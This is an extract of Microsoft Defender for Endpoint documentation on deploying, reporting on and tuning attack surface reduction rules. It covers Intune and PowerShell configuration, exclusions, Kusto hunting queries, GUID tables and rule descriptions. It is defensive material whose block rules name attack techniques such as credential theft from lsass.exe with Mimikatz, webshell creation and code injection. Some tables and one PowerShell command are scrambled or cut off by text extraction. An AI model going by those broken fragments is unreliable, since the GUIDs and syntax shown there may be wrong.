more: Use role-based access control (RBAC) and scope tags for distributed IT in
Intune.
9. In the Assignments pane, you can deploy or "assign" the profile to your user or
device groups. Learn more: Assign device profiles in Microsoft Intune
７ Note
2.
10. Review your settings in the Review + create pane. Click Create to apply the rules.
Your new attack surface reduction policy for attack surface reduction rules is listed in
Endpoint security | Attack surface reduction.
Step 2: Understand the attack surface reduction

rules reporting page in the Microsoft Defender
portal
The attack surface reduction rules reporting page is found in Microsoft Defender portal
> Reports > Attack surface reduction rules. This page has three tabs:
Detections
Configuration
Add exclusions
Detections tab
Provides a 30-day timeline of detected audit and blocked events.
The attack surface reduction rules pane provides an overview of detected events on a
per-rule basis.
７ Note
There are some variations in attack surface reduction rules reports. Microsoft is in
the process of updating the behavior of the attack surface reduction rules reports
to provide a consistent experience.
Select View detections to open the Detections tab.


The GroupBy and Filter pane provide the following options:
The GroupBy returns results set to the following groups:
No grouping
Detected file
Audit or block
Rule
Source app
Device
User
Publisher
７ Note
When filtering by rule, the number of individual detected items listed in the lower
half of the report is currently limited to 200 rules. You can use Export to save the
full list of detections to Excel.

Filter opens the Filter on rules page, which enables you to scope the results to only the
selected attack surface reduction rules:
７ Note
If you have a Microsoft Microsoft 365 Security E5 or A5, Windows E5 or A5 license,

the following link opens the Microsoft Defender 365 Reports > Attack surface
reductions > Detections tab.
Configuration tab
Lists—on a per-computer basis—the aggregate state of attack surface reduction rules:
Off, Audit, Block.
On the Configurations tab, you can check, on a per-device basis, which attack surface
reduction rules are enabled, and in which mode, by selecting the device for which you
want to review attack surface reduction rules.
The Get started link opens the Microsoft Intune admin center, where you can create or
modify an endpoint protection policy for attack surface reduction:

In Endpoint security | Overview, select Attack surface reduction:
The Endpoint Security | Attack surface reduction pane opens:


７ Note
If you have a Microsoft Defender 365 E5 (or Windows E5?) license, this link will
open the Microsoft Defender 365 Reports > Attack surface reductions >
Configurations tab.
Add exclusions
This tab provides a method to select detected entities (for example, false positives) for
exclusion. When exclusions are added, the report provides a summary of the expected
impact.
７ Note
Microsoft Defender Antivirus AV exclusions are honored by attack surface reduction

rules. See Configure and validate exclusions based on extension, name, or
location.

７ Note
If you have a Microsoft Defender 365 E5 (or Windows E5?) license, this link will
open the Microsoft Defender 365 Reports > Attack surface reductions >
Exclusions tab.
For more information about using the attack surface reduction rules report, see Attack
surface reduction rules reports.
Configure attack surface reduction per-rule

exclusions
Attack surface reduction rules now provide the capability to configure rule-specific
exclusions, known as "Per Rule Exclusions."
７ Note
Per-rule exclusions cannot currently be configured by using PowerShell or Group
Policy.
To configure specific rule exclusions:
1. Open the Microsoft Intune admin center , and navigate to Home > Endpoint
security > Attack surface reduction.
2. If it isn't already configured, set the rule for which you want to configure exclusions
to Audit or Block.
3. In ASR Only Per Rule Exclusion, click the toggle to change from Not configured to
Configured.
4. Enter the names of the files or application that you want to exclude.
5. At the bottom of the Create profile wizard, select Next and follow the wizard
instructions.
 Tip
Use the checkboxes next to your list of exclusion entries to select items to Delete,
Sort, Import, or Export.
Use PowerShell as an alternative method to enable attack

surface reduction rules
You can use PowerShell - as an alternative to Intune - to enable attack surface reduction
rules in audit mode to view a record of apps that would have been blocked if the feature
was fully enabled. You can also get an idea of how often the rules fire during normal
use.
To enable an attack surface reduction rule in audit mode, use the following PowerShell
cmdlet:
PowerShell
Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -

AttackSurfaceReductionRules_Actions AuditMode
Where <rule ID> is a GUID value of the attack surface reduction rule.
To enable all the added attack surface reduction rules in audit mode, use the following
PowerShell cmdlet:
PowerShell
(Get-MpPreference).AttackSurfaceReductionRules_Ids | Foreach {Add-

MpPreference -AttackSurfaceReductionRules_Ids $_ -
AttackSurfaceReductionRules_Actions AuditMode}
 Tip
If you want to fully audit how attack surface reduction rules will work in your
organization, you'll need to use a management tool to deploy this setting to
devices in your network(s).
You can also use Group Policy, Intune, or mobile device management (MDM)
configuration service providers (CSPs) to configure and deploy the setting. Learn more
in the main Attack surface reduction rules article.
Use Windows Event Viewer Review as an
alternative to the attack surface reduction rules
reporting page in the Microsoft Defender
portal
To review apps that would have been blocked, open Event Viewer and filter for Event ID
1121 in the Microsoft-Windows-Windows Defender/Operational log. The following table
lists all network protection events.
ﾉ Expand table
1121 Event when an attack surface reduction rule fires in block mode
1122 Event when an attack surface reduction rule fires in audit mode

 Tip
Feedback
Implement attack surface reduction
rules
Article • 10/02/2023
Applies to:

Implementing attack surface reduction rules move the first test ring into an enabled,
functional state.
Step 1: Transition attack surface reduction rules

from Audit to Block
1. After all exclusions are determined while in audit mode, start setting some attack
surface reduction rules to "block" mode, starting with the rule that has the fewest
triggered events. See Enable attack surface reduction rules.
2. Review the reporting page in the Microsoft Defender portal; see Threat protection
report in Microsoft Defender for Endpoint. Also review feedback from your
champions.
3. Refine exclusions or create new exclusions as determined necessary.
4. Switch problematic rules back to Audit.
７ Note
For problematic rules (rules creating too much noise), it is better to create
exclusions than to turn rules off or switching back to Audit. You will have to
determine what is best for your environment.
 Tip
When available, take advantage of the Warn mode setting in rules to limit
disruptions. Enabling attack surface reduction rules in Warn mode enables you to
capture triggered events and view their potential disruptions, without actually
blocking end-user access. Learn more: Warn mode for users.
How does Warn mode work?

Warn mode is effectively a Block instruction, but with the option for the user to
"Unblock" subsequent executions of the given flow or app. Warn mode unblocks on a
per device, user, file and process combination. The warn mode information is stored
locally and has a duration of 24 hours.
Step 2: Expand deployment to ring n + 1

When you're confident that you've correctly configured the attack surface reduction
rules for ring 1, you can widen the scope of your deployment to the next ring (ring n +
1).
The deployment process, steps 1 – 3, is essentially the same for each subsequent ring:
1. Test rules in Audit

2. Review attack surface reduction-triggered audit events in the Microsoft Defender
portal
3. Create exclusions
4. Review: refine, add, or remove exclusions as necessary
5. Set rules to "block"
6. Review the reporting page in the Microsoft Defender portal.
7. Create exclusions.
8. Disable problematic rules or switch them back to Audit.
Customize attack surface reduction rules
As you continue to expand your attack surface reduction rules deployment, you may
find it necessary or beneficial to customize the attack surface reduction rules that you've
enabled.
Exclude files and folders
You can choose to exclude files and folders from being evaluated by attack surface
reduction rules. When excluded, the file isn't blocked from running even if an attack
surface reduction rule detects that the file contains malicious behavior.
For example, consider the ransomware rule:
The ransomware rule is designed to help enterprise customers reduce risks of

ransomware attacks while ensuring business continuity. By default, the ransomware rule
errors on the side of caution and protect against files that haven't yet attained sufficient
reputation and trust. To reemphasize, the ransomware rule only triggers on files that
haven't gained enough positive reputation and prevalence, based on usage metrics of
millions of our customers. Usually, the blocks are self resolved, because each file's
"reputation and trust" values are incrementally upgraded as non-problematic usage
increases.
In cases in which blocks aren't self resolved in a timely manner, customers can - at their
own risk - make use of either the self-service mechanism or an Indicator of Compromise
(IOC)-based "allowlist" capability to unblock the files themselves.
２ Warning
Excluding or unblocking files or folders could potentially allow unsafe files to run
and infect your devices. Excluding files or folders can severely reduce the protection
provided by attack surface reduction rules. Files that would have been blocked by a
rule will be allowed to run, and there will be no report or event recorded.
An exclusion can apply to all rules that allow exclusions or apply to specific rules using
per-rule exclusions. You can specify an individual file, folder path, or the fully qualified
domain name for a resource.
An exclusion is applied only when the excluded application or service starts. For
example, if you add an exclusion for an update service that is already running, the
update service continues to trigger events until the service is stopped and restarted.
Attack surface reduction supports environment variables and wildcards. For information
about using wildcards, see use wildcards in the file name and folder path or extension
exclusion lists. If you're encountering problems with rules detecting files that you believe
shouldn't be detected, use audit mode to test the rule.
See the attack surface reduction rules reference article for details on each rule.
Use Group Policy to exclude files and folders
1. On your Group Policy management computer, open the Group Policy Management
Console , right-click the Group Policy Object you want to configure and select
Edit.
2. In the Group Policy Management Editor, go to Computer configuration and click

Administrative templates.
3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Microsoft Defender Exploit Guard > Attack surface reduction.
4. Double-click the Exclude files and paths from Attack surface reduction Rules
setting and set the option to Enabled. Select Show and enter each file or folder in
the Value name column. Enter 0 in the Value column for each item.
２ Warning
Do not use quotes as they are not supported for either the Value name column or
the Value column.
Use PowerShell to exclude files and folders
1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.
2. Enter the following cmdlet:
PowerShell
Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully

qualified path or resource>"
Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add

more folders to the list.
） Important
Use Add-MpPreference to append or add apps to the list. Using the Set-
MpPreference cmdlet will overwrite the existing list.
Use MDM CSPs to exclude files and folders
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions

configuration service provider (CSP) to add exclusions.
Customize the notification
You can customize the notification for when a rule is triggered and blocks an app or file.
See the Windows Security article.
Additional articles in this deployment

collection
See also
 Tip
Feedback

Operationalize attack surface reduction
rules
Article • 09/29/2023
Applies to:

After you've fully deployed attack surface reduction rules, it's vital that you have
processes in place to monitor and respond to ASR-related activities. Activities include:
Managing ASR rules false positives

False positives/negatives can occur with any threat protection solution. False positives
are cases in which an entity (such as a file or process) is detected and identified as
malicious, although the entity isn't actually a threat. In contrast, a false negative is an
entity that wasn't detected as a threat but is malicious. For more information about false
positives and false negatives, see: Address false positives/negatives in Microsoft
Keeping up with ASR rules reports

Consistent, regular review of reports is an essential aspect of maintaining your attack
surface reduction rules deployment and keeping abreast of newly emerging threats.
Your organization should have scheduled reviews of attack surface reduction rules
events on a cadence that keeps current with attack surface reduction rules-reported
events. Depending on the size of your organization, reviews might be daily, hourly, or
continuous monitoring.
ASR rules Advanced Hunting

One of the most powerful features of Microsoft Defender XDR is advanced hunting. If
you're not familiar with advanced hunting, see: Proactively hunt for threats with
advanced hunting.

Advanced hunting is a query-based (Kusto Query Language) threat-hunting tool that

lets you explore up to 30 days of the captured data. Through advanced hunting, you can
proactively inspect events in order to locate interesting indicators and entities. The
flexible access to data facilitates unconstrained hunting for both known and potential
threats.
Through advanced hunting, it's possible to extract attack surface reduction rules
information, create reports, and get in-depth information on the context of a given
attack surface reduction rule audit or block event.
You can query attack surface reduction rule events from the DeviceEvents table in the
advanced hunting section of the Microsoft Defender portal. For example, the following
query shows how to report all the events that have attack surface reduction rules as data
source, for the last 30 days. The query then summarizes by the ActionType count with
the name of the attack surface reduction rule.
Attack surface reduction events shown in the advancing hunting portal are throttled to
unique processes seen every hour. The time of the attack surface reduction event is the
first time the event is seen within that hour.
Kusto
DeviceEvents
| where ActionType startswith "Asr"
| summarize EventCount=count() by ActionType

The above shows that 187 events were registered for AsrLsassCredentialTheft:
102 for Blocked

85 for Audited
Two events for AsrOfficeChildProcess (1 for Audited and 1 for Block)
Eight events for AsrPsexecWmiChildProcessAudited
If you want to focus on the AsrOfficeChildProcess rule and get details on the actual files
and processes involved, change the filter for ActionType and replace the summarize line
with a projection of the wanted fields (in this case they're DeviceName, FileName,
FolderPath, etc.).
Kusto
DeviceEvents
| where (Actiontype startswith "AsrOfficechild")
| extend RuleId=extractjson("$Ruleid", AdditionalFields, typeof(string))
| project DeviceName, FileName, FolderPath, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine

The true benefit of advanced hunting is that you can shape the queries to your liking. By
shaping your query you can see the exact story of what was happening, regardless of
whether you want to pinpoint something on an individual machine, or you want to
extract insights from your entire environment.
For more information about hunting options, see: Demystifying attack surface reduction
rules - Part 3 .
Articles in this deployment collection

 Tip
Feedback

Article • 02/27/2024
Applies to:
Microsoft Microsoft Defender XDR for Endpoint Plan 1

Platforms:
Windows
This article provides information about Microsoft Defender for Endpoint attack surface
reduction rules (ASR rules):
ASR rules supported operating system versions

ASR rules supported configuration management systems
Per ASR rule alert and notification details
ASR rule to GUID matrix
ASR rule modes
Per-rule-descriptions
） Important

Attack surface reduction rules by type

Attack surface reduction rules are categorized as one of two types:
Standard protection rules: Are the minimum set of rules which Microsoft
recommends you always enable, while you are evaluating the impact and
configuration needs of the other ASR rules. These rules typically have minimal-to-
no noticeable impact on the end user.
Other rules: Rules which require some measure of following the documented
deployment steps [Plan > Test (audit) > Enable (block/warn modes)], as
documented in the Attack surface reduction rules deployment guide
For the easiest method to enable the standard protection rules, see: Simplified standard
protection option.
ﾉ Expand table
ASR rule name: Standard Other

protection rule? rule?
Block abuse of exploited vulnerable signed drivers Yes
Block Adobe Reader from creating child processes Yes
Block all Office applications from creating child processes Yes
Block credential stealing from the Windows local security Yes

authority subsystem (lsass.exe)
Block executable content from email client and webmail Yes
Block executable files from running unless they meet a Yes

prevalence, age, or trusted list criterion
Block execution of potentially obfuscated scripts Yes
Block JavaScript or VBScript from launching downloaded Yes

executable content
Block Office applications from creating executable content Yes
Block Office applications from injecting code into other Yes

processes
Block Office communication application from creating child Yes

processes
Block persistence through WMI event subscription Yes
Block process creations originating from PSExec and WMI Yes

commands
Block rebooting machine in Safe Mode (preview) Yes
Block untrusted and unsigned processes that run from USB Yes
Block use of copied or impersonated system tools (preview) Yes
Block Webshell creation for Servers Yes
Block Win32 API calls from Office macros Yes

ASR rule name: Standard Other
protection rule? rule?
Use advanced protection against ransomware Yes
Microsoft Defender Antivirus exclusions and

ASR rules
Microsoft Defender Antivirus exclusions apply to some Microsoft Defender for Endpoint
capabilities, such as some of the attack surface reduction rules.
The following ASR rules DO NOT honor Microsoft Defender Antivirus exclusions:
ﾉ Expand table
ASR rules name:
Block Adobe Reader from creating child processes
Block process creations originating from PSExec and WMI commands
Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block Office applications from creating executable content
Block Office applications from injecting code into other processes
Block Office communication application from creating child processes
７ Note
For information about configuring per-rule exclusions, see the section titled
Configure ASR rules per-rule exclusions in the topic Test attack surface reduction
rules.
ASR rules supported operating systems

The following table lists the supported operating systems for rules that are currently
released to general availability. The rules are listed alphabetical order in this table.
７ Note
Unless otherwise indicated, the minimum Windows 10 build is version 1709 (RS3,
build 16299) or later; the minimum Windows Server build is version 1809 or later.
Attack surface reduction rules in Windows Server 2012 R2 and

Windows Server 2016 are available for devices onboarded using the modern
unified solution package. For more information, see New functionality in the
modern unified solution for Windows Server 2012 R2 and 2016 Preview.
ﾉ Expand table
Rule name Windows 11 Windows Server Windows Windows Server Windows Server
and 2022 Server 2016 [1, 2] 2012 R2 [1, 2]
Windows 10 and
Windows Server
2019
Block abuse of Y Y Y Y Y
exploited version
vulnerable 1803
signed drivers (Semi-
Annual
Enterprise
Channel)
or later
Block Adobe Y Y Y Y Y
Reader from version 1809
creating child or later [3]
processes
Block all Office Y Y Y Y Y

applications
from creating
child processes
Block credential Y Y Y Y Y
stealing from version 1803
the Windows or later [3]
local security
authority
subsystem
(lsass.exe)
Block Y Y Y Y Y
executable
content from
email client and
webmail
and 2022 Server 2016 [1, 2] 2012 R2 [1, 2]
Windows 10 and
Windows Server
2019
Block Y Y Y Y Y
executable files version 1803
from running or later [3]
unless they
meet a
prevalence,
age, or trusted
list criterion
Block execution Y Y Y Y Y
of potentially
obfuscated
scripts
Block JavaScript Y Y Y N Y
or VBScript
from launching
downloaded
executable
content
Block Office Y Y Y Y Y
applications
from creating
executable
content
applications
from injecting
code into other
processes
communication
application
from creating
child processes
Block Y Y Y N Y
persistence version 1903 version
through (build 1903
Windows 18362) or (build
Management later [3]
and 2022 Server 2016 [1, 2] 2012 R2 [1, 2]
Windows 10 and
Windows Server
2019
Instrumentation 18362) or
(WMI) event later
subscription
Block process Y Y Y Y Y
creations version 1803
originating or later [3]
from PSExec
and WMI
commands
Block rebooting Y Y Y Y Y
machine in Safe
Mode (preview)
Block untrusted Y Y Y Y Y
and unsigned
processes that
run from USB
Block use of Y Y Y Y Y
copied or
impersonated
system tools
(preview)
Block Webshell N Y Y Y N
creation for Exchange Role Exchange Exchange Role
Servers Only Role Only Only
Block Win32 Y N N N N
API calls from
Office macros
Use advanced Y Y Y Y Y
protection version 1803
against or later [3]
ransomware
(1) Refers to the modern unified solution for Windows Server 2012 and 2016. For more
information, see Onboard Windows Servers to the Defender for Endpoint service.
(2) For Windows Server 2016 and Windows Server 2012 R2, the minimum required
version of Microsoft Endpoint Configuration Manager is version 2111.
(3) Version and build number apply only to Windows 10.
ASR rules supported configuration

management systems
Links to information about configuration management system versions referenced in
this table are listed below this table.
ﾉ Expand table
Rule name Microsoft Microsoft Endpoint Group PowerShell[1]

Intune Configuration Policy[1]
Manager
Block abuse of exploited Y Y Y

vulnerable signed drivers
Block Adobe Reader from Y Y Y

creating child processes
Block all Office applications Y Y Y Y

from creating child processes
CB 1710
Block credential stealing from Y Y Y Y

the Windows local security
authority subsystem (lsass.exe) CB 1802
Block executable content from Y Y Y Y

email client and webmail
CB 1710
Block executable files from Y Y Y Y

running unless they meet a
prevalence, age, or trusted list CB 1802
criterion
Block execution of potentially Y Y Y Y

obfuscated scripts
CB 1710
Block JavaScript or VBScript Y Y Y Y

from launching downloaded
executable content CB 1710
Block Office applications from Y Y Y Y

creating executable content
CB 1710
Rule name Microsoft Microsoft Endpoint Group PowerShell[1]
Intune Configuration Policy[1]
Manager
Block Office applications from Y Y Y Y

injecting code into other
processes CB 1710
Block Office communication Y Y Y Y

application from creating child
processes CB 1710
Block persistence through Y Y Y

WMI event subscription
Block process creations Y Y Y

originating from PSExec and
WMI commands
Block rebooting machine in Y Y Y

Safe Mode (preview)
Block untrusted and unsigned Y Y Y Y

processes that run from USB
CB 1802
Block use of copied or Y Y Y

impersonated system tools
(preview)
Block Webshell creation for Y Y Y

Servers
Block Win32 API calls from Y Y Y Y

Office macros
CB 1710
Use advanced protection Y Y Y Y

against ransomware
CB 1802
(1) You can configure attack surface reduction rules on a per-rule basis by using any
rule's GUID.
Configuration Manager CB 1710

Configuration Manager CB 1802
Microsoft Configuration Manager CB 1710
System Center Configuration Manager (SCCM) CB 1710
SCCM is now Microsoft Configuration Manager.
Per ASR rule alert and notification details
Toast notifications are generated for all rules in Block mode. Rules in any other mode
won't generate toast notifications
For rules with the "Rule State" specified:
ASR rules with <ASR Rule, Rule State> combinations are used to surface alerts
(toast notifications) on Microsoft Defender for Endpoint only for devices at cloud
block level High. Devices not at High cloud block level won't generate alerts for
any <ASR Rule, Rule State> combinations
EDR alerts are generated for ASR rules in the specified states, for devices at cloud
block level High+
ﾉ Expand table
Rule name: Rule state: Generates alerts Generates toast

in EDR? notifications?
(Yes | No) (Yes | No)
Only for devices In Block mode only and

at cloud block only for devices at cloud
level High+ block level High
Block abuse of exploited N Y

vulnerable signed drivers
Block Adobe Reader from Block Y Y

Block all Office applications from N Y

Block credential stealing from the N Y

Windows local security authority
subsystem (lsass.exe)
Block executable content from Y Y

email client and webmail
Block executable files from N Y

running unless they meet a
prevalence, age, or trusted list
criterion
Block execution of potentially Audit | Block Y|Y N|Y

obfuscated scripts
Rule name: Rule state: Generates alerts Generates toast
in EDR? notifications?
(Yes | No) (Yes | No)
Block JavaScript or VBScript from Block Y Y

launching downloaded
executable content
Block Office applications from N Y

creating executable content
Block Office applications from N Y

injecting code into other
processes
Block Office communication N Y

application from creating child
processes
Block persistence through WMI Audit | Block Y|Y N|Y

event subscription
Block process creations N Y

originating from PSExec and WMI
commands
Block rebooting machine in Safe N N

Mode (preview)
Block untrusted and unsigned Audit | Block Y|Y N|Y

processes that run from USB
Block use of copied or N N

impersonated system tools
(preview)
Block Webshell creation for N N

Servers
Block Win32 API calls from Office N Y

macros
Use advanced protection against Audit | Block Y|Y N|Y

ransomware
ASR rule to GUID matrix

ﾉ Expand table
Rule Name Rule GUID
Block abuse of exploited vulnerable signed drivers 56a863a9-875e-4185-98a7-

b882c64b5ce5
Block Adobe Reader from creating child processes 7674ba52-37eb-4a4f-a9a1-

f0f9a1619a2c
Block all Office applications from creating child processes d4f940ab-401b-4efc-aadc-

ad5f3c50688a
Block credential stealing from the Windows local security 9e6c4e1f-7d60-472f-ba1a-

authority subsystem (lsass.exe) a39ef669e4b2
Block executable content from email client and webmail be9ba2d9-53ea-4cdc-84e5-

9b1eeee46550
Block executable files from running unless they meet a 01443614-cd74-433a-b99e-

prevalence, age, or trusted list criterion 2ecdc07bfc25
Block execution of potentially obfuscated scripts 5beb7efe-fd9a-4556-801d-

275e5ffc04cc
Block JavaScript or VBScript from launching downloaded d3e037e1-3eb8-44c8-a917-

executable content 57927947596d
Block Office applications from creating executable content 3b576869-a4ec-4529-8536-

b80a7769e899
Block Office applications from injecting code into other 75668c1f-73b5-4cf0-bb93-

processes 3ecf5cb7cc84
Block Office communication application from creating child 26190899-1602-49e8-8b27-

processes eb1d0a1ce869
Block persistence through WMI event subscription e6db77e5-3df2-4cf1-b95a-

* File and folder exclusions not supported. 636979351e5b
Block process creations originating from PSExec and WMI d1e49aac-8f56-4280-b9ba-

commands 993a6d77406c
Block rebooting machine in Safe Mode (preview) 33ddedf1-c6e0-47cb-833e-

de6133960387
Block untrusted and unsigned processes that run from USB b2b3f03d-6a65-4f7b-a9c7-
1c7ef74a9ba4
Block use of copied or impersonated system tools (preview) c0033c00-d16d-4114-a5a0-

dc9b3a7d2ceb
Block Webshell creation for Servers a8f5898e-1dc8-49a9-9878-

85004b8a61e6
Rule Name Rule GUID
Block Win32 API calls from Office macros 92e97fa1-2edf-4476-bdd6-

9dd0b4dddc7b
Use advanced protection against ransomware c1db55ab-c21a-4637-bb3f-

a12568109d35
ASR rule modes

Not configured or Disable: The state in which the ASR rule hasn't been enabled or
has been disabled. The code for this state = 0.
Block: The state in which the ASR rule is enabled. The code for this state is 1.
Audit: The state in which the ASR rule is evaluated for the effect it would have on
the organization or environment if enabled (set to block or warn). The code for this
state is 2.
Warn The state in which the ASR rule is enabled and presents a notification to the
end-user, but permits the end-user to bypass the block. The code for this state is 6.
Warn mode is a block-mode type that alerts users about potentially risky actions. Users
can choose to bypass the block warning message and allow the underlying action. Users
can select OK to enforce the block, or select the bypass option - Unblock - through the
end-user pop-up toast notification that is generated at the time of the block. After the
warning is unblocked, the operation is allowed until the next time the warning message
occurs, at which time the end-user will need to reperform the action.
When the allow button is clicked, the block will be suppressed for 24 hours. After 24
hours, the end-user will need to allow the block again. The warn mode for ASR rules is
only supported for RS5+ (1809+) devices. If bypass is assigned to ASR rules on devices
with older versions, the rule will be in blocked mode.
You can also set a rule in warn mode via PowerShell by specifying the
AttackSurfaceReductionRules_Actions as "Warn". For example:
PowerShell

b882c64b5ce5 -AttackSurfaceReductionRules_Actions Warn
Per rule descriptions

This rule prevents an application from writing a vulnerable signed driver to disk. In-the-
wild, vulnerable signed drivers can be exploited by local applications - that have
sufficient privileges - to gain access to the kernel. Vulnerable signed drivers enable
attackers to disable or circumvent security solutions, eventually leading to system
compromise.
The Block abuse of exploited vulnerable signed drivers rule doesn't block a driver
already existing on the system from being loaded.
７ Note
You can configure this rule using Intune OMA-URI. See Intune OMA-URI for
configuring custom rules.
You can also configure this rule using PowerShell.
To have a driver examined, use this Web site to Submit a driver for analysis .
Intune Name: Block abuse of exploited vulnerable signed drivers
Configuration Manager name: Not yet available
GUID: 56a863a9-875e-4185-98a7-b882c64b5ce5
Advanced hunting action type:
AsrVulnerableSignedDriverAudited
AsrVulnerableSignedDriverBlocked

This rule prevents attacks by blocking Adobe Reader from creating processes.
Malware can download and launch payloads and break out of Adobe Reader through
social engineering or exploits. By blocking child processes from being generated by
Adobe Reader, malware attempting to use Adobe Reader as an attack vector are
prevented from spreading.
Intune name: Process creation from Adobe Reader (beta)

GUID: 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c
AsrAdobeReaderChildProcessAudited
AsrAdobeReaderChildProcessBlocked
Dependencies: Microsoft Defender Antivirus
Block all Office applications from creating child processes

This rule blocks Office apps from creating child processes. Office apps include Word,
Excel, PowerPoint, OneNote, and Access.
Creating malicious child processes is a common malware strategy. Malware that abuses
Office as a vector often runs VBA macros and exploit code to download and attempt to
run more payloads. However, some legitimate line-of-business applications might also
generate child processes for benign purposes; such as spawning a command prompt or
using PowerShell to configure registry settings.
Intune name: Office apps launching child processes
Configuration Manager name: Block Office application from creating child

processes
GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a
AsrOfficeChildProcessAudited
AsrOfficeChildProcessBlocked
Block credential stealing from the Windows local security

authority subsystem
This rule helps prevent credential stealing by locking down Local Security Authority
Subsystem Service (LSASS).
LSASS authenticates users who sign in on a Windows computer. Microsoft Defender

Credential Guard in Windows normally prevents attempts to extract credentials from
LSASS. Some organizations can't enable Credential Guard on all of their computers
because of compatibility issues with custom smartcard drivers or other programs that
load into the Local Security Authority (LSA). In these cases, attackers can use tools like
Mimikatz to scrape cleartext passwords and NTLM hashes from LSASS.
By default the state of this rule is set to block. In most cases, many processes make calls
to LSASS for access rights that are not needed. For example, such as when the initial
block from the ASR rule results in a subsequent call for a lesser privilege which
subsequently succeeds. For information about the types of rights that are typically
requested in process calls to LSASS, see: Process Security and Access Rights.
７ Note
In some apps, the code enumerates all running processes and attempts to open
them with exhaustive permissions. This rule denies the app's process open action
and logs the details to the security event log. This rule can generate a lot of noise. If
you have an app that simply enumerates LSASS, but has no real impact in
functionality, there is no need to add it to the exclusion list. By itself, this event log
entry doesn't necessarily indicate a malicious threat.
Intune name: Flag credential stealing from the Windows local security authority
subsystem
Configuration Manager name: Block credential stealing from the Windows local
security authority subsystem
GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2
AsrLsassCredentialTheftAudited
AsrLsassCredentialTheftBlocked
Block executable content from email client and webmail

This rule blocks email opened within the Microsoft Outlook application, or Outlook.com
and other popular webmail providers from propagating the following file types:
Executable files (such as .exe, .dll, or .scr)

Script files (such as a PowerShell .ps1, Visual Basic .vbs, or JavaScript .js file)
Intune name: Execution of executable content (exe, dll, ps, js, vbs, etc.) dropped
from email (webmail/mail client) (no exceptions)
Microsoft Configuration Manager name: Block executable content from email client
and webmail
GUID: be9ba2d9-53ea-4cdc-84e5-9b1eeee46550
AsrExecutableEmailContentAudited
AsrExecutableEmailContentBlocked
７ Note
The rule Block executable content from email client and webmail has the
following alternative descriptions, depending on which application you use:
Intune (Configuration Profiles): Execution of executable content (exe, dll, ps, js,
vbs, etc.) dropped from email (webmail/mail client) (no exceptions).
Configuration Manager: Block executable content download from email and
webmail clients.
Group Policy: Block executable content from email client and webmail.
Block executable files from running unless they meet a

prevalence, age, or trusted list criterion
This rule blocks executable files, such as .exe, .dll, or .scr, from launching. Thus, launching
untrusted or unknown executable files can be risky, as it might not be initially clear if the
files are malicious.
） Important
You must enable cloud-delivered protection to use this rule.
The rule Block executable files from running unless they meet a prevalence, age,
or trusted list criterion with GUID 01443614-cd74-433a-b99e-2ecdc07bfc25 is owned
by Microsoft and is not specified by admins. This rule uses cloud-delivered
protection to update its trusted list regularly.
You can specify individual files or folders (using folder paths or fully qualified
resource names) but you can't specify which rules or exclusions apply to.
Intune name: Executables that don't meet a prevalence, age, or trusted list
criteria
Configuration Manager name: Block executable files from running unless they meet a
prevalence, age, or trusted list criteria
GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25
AsrUntrustedExecutableAudited
AsrUntrustedExecutableBlocked
Dependencies: Microsoft Defender Antivirus, Cloud Protection
Block execution of potentially obfuscated scripts

This rule detects suspicious properties within an obfuscated script.
） Important
PowerShell scripts are now supported for the "Block execution of potentially
obfuscated scripts" rule.
Script obfuscation is a common technique that both malware authors and legitimate
applications use to hide intellectual property or decrease script loading times. Malware
authors also use obfuscation to make malicious code harder to read, which hampers
close scrutiny by humans and security software.
Intune name: Obfuscated js/vbs/ps/macro code
Configuration Manager name: Block execution of potentially obfuscated scripts
GUID: 5beb7efe-fd9a-4556-801d-275e5ffc04cc
AsrObfuscatedScriptAudited
AsrObfuscatedScriptBlocked
Dependencies: Microsoft Defender Antivirus, AntiMalware Scan Interface (AMSI)

Block JavaScript or VBScript from launching downloaded
executable content
This rule prevents scripts from launching potentially malicious downloaded content.
Malware written in JavaScript or VBScript often acts as a downloader to fetch and launch
other malware from the Internet.
Although not common, line-of-business applications sometimes use scripts to download

and launch installers.
Intune name: js/vbs executing payload downloaded from Internet (no exceptions)
Configuration Manager name: Block JavaScript or VBScript from launching downloaded

executable content
GUID: d3e037e1-3eb8-44c8-a917-57927947596d
AsrScriptExecutableDownloadAudited
AsrScriptExecutableDownloadBlocked
Dependencies: Microsoft Defender Antivirus, AMSI
Block Office applications from creating executable

content
This rule prevents Office apps, including Word, Excel, and PowerPoint, from creating
potentially malicious executable content, by blocking malicious code from being written
to disk.
Malware that abuses Office as a vector might attempt to break out of Office and save
malicious components to disk. These malicious components would survive a computer
reboot and persist on the system. Therefore, this rule defends against a common
persistence technique. This rule also blocks execution of untrusted files that may have
been saved by Office macros that are allowed to run in Office files.
Intune name: Office apps/macros creating executable content
Configuration Manager name: Block Office applications from creating executable

content
GUID: 3b576869-a4ec-4529-8536-b80a7769e899
AsrExecutableOfficeContentAudited
AsrExecutableOfficeContentBlocked
Dependencies: Microsoft Defender Antivirus, RPC
Block Office applications from injecting code into other

processes
This rule blocks code injection attempts from Office apps into other processes.
） Important
This rule requires restarting Microsoft 365 Apps (Office applications) for the
configuration changes to take effect.
Attackers might attempt to use Office apps to migrate malicious code into other
processes through code injection, so the code can masquerade as a clean process.
There are no known legitimate business purposes for using code injection.
This rule applies to Word, Excel, OneNote, and PowerPoint.
Intune name: Office apps injecting code into other processes (no exceptions)
Configuration Manager name: Block Office applications from injecting code into
other processes
GUID: 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84
AsrOfficeProcessInjectionAudited
AsrOfficeProcessInjectionBlocked
Block Office communication application from creating

child processes
This rule prevents Outlook from creating child processes, while still allowing legitimate
Outlook functions.
This rule protects against social engineering attacks and prevents exploiting code from
abusing vulnerabilities in Outlook. It also protects against Outlook rules and forms
exploits that attackers can use when a user's credentials are compromised.
７ Note
This rule blocks DLP policy tips and ToolTips in Outlook. This rule applies to
Outlook and Outlook.com only.
